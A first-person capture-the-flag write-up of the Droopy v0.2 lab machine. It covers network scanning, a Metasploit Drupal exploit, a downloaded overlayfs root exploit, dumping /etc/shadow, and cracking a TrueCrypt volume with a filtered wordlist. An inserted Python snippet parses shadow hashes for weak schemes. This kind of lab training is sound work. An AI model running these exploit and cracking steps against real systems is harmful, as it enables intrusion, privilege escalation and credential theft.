This is my very first boot2root write-up. I had a lot of fun completing the challenge and writing up how I did it.

Today’s challenge is called Droopy: v0.2.  This challenge was very similar to the types of systems that I faced during the OSCP lab.  It was pretty straightforward: discover, enumerate, exploit, and loot.  It was an easy one but still quite fun.  Adding in the extra puzzle at the end was a nice touch and forced me to learn some new tools I hadn’t had the opportunity to use before.

Discover:

First I needed to find the IP address.

netdiscover -r 10.0.2.0/24


Ahh, it looks like it is 10.0.2.28.

Enumeration:

To find running services I had to enumerate.

nmap -p- -A 10.0.2.28


It looks like only one port is open: port 80, running Drupal 7.

Next I run Nikto to see if I can find any obvious low hanging fruit.

nikto -host http://10.0.2.28

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.0.2.28
+ Target Hostname: 10.0.2.28
+ Target Port: 80
+ Start Time: 2016-04-27 20:16:45 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /scripts/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x60e 0x4fef78de7d280
+ OSVDB-3268: /includes/: Directory indexing found.
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /misc/: Directory indexing found.
+ Entry '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /modules/: Directory indexing found.
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /profiles/: Directory indexing found.
+ Entry '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /themes/: Directory indexing found.
+ Entry '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Multiple index files found: /index.php, /index.html
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3268: /sites/: Directory indexing found.
+ 8383 requests: 0 error(s) and 52 item(s) reported on remote host
+ End Time: 2016-04-27 20:17:11 (GMT-4) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto found a bunch of interesting directories with indexing enabled and typical Drupal files.

With the information I have obtained, I now have a pretty good idea of how to attack this.

Exploitation:

I decided to fire up Metasploit because I knew it had an exploit that works against Drupal.

msfconsole

search drupal


use exploit/multi/http/drupal_drupageddon

set rhost 10.0.2.28


Now that I have Metasploit configured I can run the exploit.

run


Success! I have a meterpreter shell.

I decide to drop into a command shell to have a look around.

shell

I wanted to have a better looking shell so I ran the following command.

python -c 'import pty;pty.spawn("/bin/bash")'

Let’s see what user I am running as.

id


I have a low privilege shell so now I need to elevate.

Elevate:

I start by identifying the kernel and the version of Linux that is running so I can narrow down an exploit.

uname -a && cat /etc/issue


Now I know what I am dealing with.  Next I need to find a directory I can write to and run scripts from.

find / -writable -type d 2>/dev/null


Ok, the /tmp directory looks like a good place to work from.

I searched Exploit-db for a privesc exploit that works for Ubuntu 14.04.

I find the overlayfs Local Root exploit and give it a go.

wget https://www.exploit-db.com/download/37292 && mv 37292 ofs.c

gcc ofs.c -o ofs

./ofs

id


And success!! I have root.

Loot:

While looking around I find an email that looks interesting.

cat /var/mail/www-data


Ah, ok so there must be an encrypted file somewhere with the flag in it.

ls -la /root


I found a TrueCrypt volume in the root home directory.

I continued to look around and checked out the shadow file.

cat /etc/shadow


The hash looks interesting, so I wanted to know what kind of hash it is. This proved useful later.

$6$4onuSzBI$X19Aq0XXMti44iNSno3omOTq.fCPo342mPfprBQMMuXENvX1kt975gI1tkmR4h574GyBZRpfECmciaVWKISuT0:16415:0:99999:7:::
http://www.onlinehashcrack.com/hash-identification.php


Ok, it’s a sha512 hash.
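The hash type can also be read straight off the `$id$` prefix of the shadow entry instead of pasting it into a web form. Below is an added Python example, not part of the original write-up: it parses a shadow line, classifies the hash scheme, and flags accounts still on weak schemes; the hash in the sample line is the one quoted above, while the username "root" is an assumption made for the example.

```python
from datetime import date, timedelta

# crypt(3) scheme identifiers used in /etc/shadow, keyed by the "$id$" prefix.
CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}

# Constructed sample entry: the hash is the one quoted from the VM above;
# the username "root" is an assumption made for this example.
SAMPLE_SHADOW_LINE = (
    "root:$6$4onuSzBI$X19Aq0XXMti44iNSno3omOTq.fCPo342mPfprBQMMuXENvX1kt975gI1"
    "tkmR4h574GyBZRpfECmciaVWKISuT0:16415:0:99999:7:::"
)

def parse_hash_field(field):
    """Return (scheme, salt, rounds) for the password field of a shadow entry."""
    if field == "" or field.startswith(("!", "*")):
        return "locked-or-empty", "", None
    # Modular crypt format is "$id$[rounds=N$]salt$digest"; without the leading
    # "$" the field is legacy DES crypt or something this parser does not know.
    parts = field.split("$")
    if len(parts) < 4 or parts[0] != "":
        return "unknown-or-des", "", None
    scheme = CRYPT_IDS.get(parts[1], "unknown:" + parts[1])
    rest, rounds = parts[2:], None
    if rest[0].startswith("rounds="):
        rounds, rest = int(rest[0][len("rounds="):]), rest[1:]
    if scheme in ("sha256crypt", "sha512crypt") and rounds is None:
        rounds = 5000  # glibc default when no rounds= parameter is present
    return scheme, rest[0], rounds

def parse_shadow_line(line):
    """Split one /etc/shadow line into its nine fields and classify the hash."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError("shadow entries have nine colon-separated fields")
    scheme, salt, rounds = parse_hash_field(fields[1])
    # Field 3 is the date of the last password change, in days since the epoch.
    last_change = date(1970, 1, 1) + timedelta(days=int(fields[2])) if fields[2] else None
    return {"user": fields[0], "scheme": scheme, "salt": salt, "rounds": rounds,
            "last_change": last_change,
            "max_days": int(fields[4]) if fields[4] else None}

def weak_hash_users(shadow_text):
    """Names of accounts whose password hash uses a scheme worth re-hashing."""
    weak = {"md5crypt", "unknown-or-des"}
    entries = (parse_shadow_line(l) for l in shadow_text.splitlines() if l.strip())
    return [e["user"] for e in entries if e["scheme"] in weak]
```

Run over a real shadow file, the same parser makes it easy to spot accounts still on md5crypt or DES and passwords that have not changed in years.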

I move on to attacking the TrueCrypt volume. The truecrack version in Kali gives you three key options to choose from.

ripemd160|sha512|whirlpool

Since the hash I looked at before was identified as sha512, it seemed logical to start there.

truecrack --truecrypt dave.tc -k sha512 -w /usr/share/wordlists/rockyou.txt

After 24 hours only 1.5M attempts had completed, and truecrack segfaulted several times on really long strings and strings with unusual characters.  I needed to take a different approach.

I see that rockyou.txt has over 14M lines.  If I kept going with the same strategy it could take quite a while. I needed a plan.

root@Oak:~# wc -l /usr/share/wordlists/rockyou.txt 
14344382 /usr/share/wordlists/rockyou.txt

I don’t have a GPU rig so I decided that I needed to narrow down the word list file to a more manageable level. I went back to the email from Dave to look for clues. The email mentioned 11 characters, and something about an academy.  I decided to find all 11-character lowercase strings ending in academy in the rockyou.txt file and export them to a custom wordlist file.

awk 'length($1) == 11 { print $1 }' /usr/share/wordlists/rockyou.txt |egrep '^[[:lower:]]+academy' > 11characademy.lst

The new wordlist only contains 11 lines. I didn’t think it would work, but I gave it a go anyway.

root@Oak:~# wc -l Downloads/11characademy.lst 
11 Downloads/11characademy.lst

truecrack --truecrypt dave.tc -k sha512 -w 11characademy.lst

Success! Wow, I was surprised. That saved a lot of time.


Now to mount the volume and explore its hidden treasures.

mkdir dave && cryptsetup --type tcrypt open Downloads/dave.tc dave && mount /dev/mapper/dave dave

With the volume mounted I did a recursive listing to see if anything stuck out.

Sure enough, the flag has been found!

root@Oak:~# ls -laR dave/
dave/:
total 20
drwxr-xr-x 6 root root 1024 Apr 12 08:00 .
drwxr-xr-x 58 root root 4096 Apr 29 10:51 ..
drwxr-xr-x 2 root root 1024 Apr 29 10:59 buller
drwx------ 2 root root 12288 Apr 12 07:53 lost+found
drwxr-xr-x 2 root root 1024 Apr 29 10:59 panama
drwxr-xr-x 3 root root 1024 Apr 29 10:54 .secret

dave/buller:
total 11
drwxr-xr-x 2 root root 1024 Apr 29 10:59 .
drwxr-xr-x 6 root root 1024 Apr 12 08:00 ..
-rw-r--r-- 1 root root 8393 Oct 4 2013 BullingdonCrest.jpg

dave/lost+found:
total 13
drwx------ 2 root root 12288 Apr 12 07:53 .
drwxr-xr-x 6 root root 1024 Apr 12 08:00 ..

dave/panama:
total 52
drwxr-xr-x 2 root root 1024 Apr 29 10:59 .
drwxr-xr-x 6 root root 1024 Apr 12 08:00 ..
-rw-r--r-- 1 root root 49257 Jun 15 2014 shares.jpg

dave/.secret:
total 64
drwxr-xr-x 3 root root 1024 Apr 29 10:54 .
drwxr-xr-x 6 root root 1024 Apr 12 08:00 ..
-rw-r--r-- 1 root root 61118 Feb 25 03:57 piers.png
drwxr-xr-x 2 root root 1024 Apr 12 08:16 .top

dave/.secret/.top:
total 3
drwxr-xr-x 2 root root 1024 Apr 12 08:16 .
drwxr-xr-x 3 root root 1024 Apr 29 10:54 ..
-r-------- 1 root root 872 Apr 12 08:16 flag.txt


Final Thoughts:

This challenge was great fun. I liked the extra step of cracking the TrueCrypt volume to find the flag.  It gave me an opportunity to learn about cryptsetup for mounting TrueCrypt volumes and a chance to use truecrack.  Due to my hardware limitations I was forced to think outside the box to save time. I look forward to more challenges from knightmare.
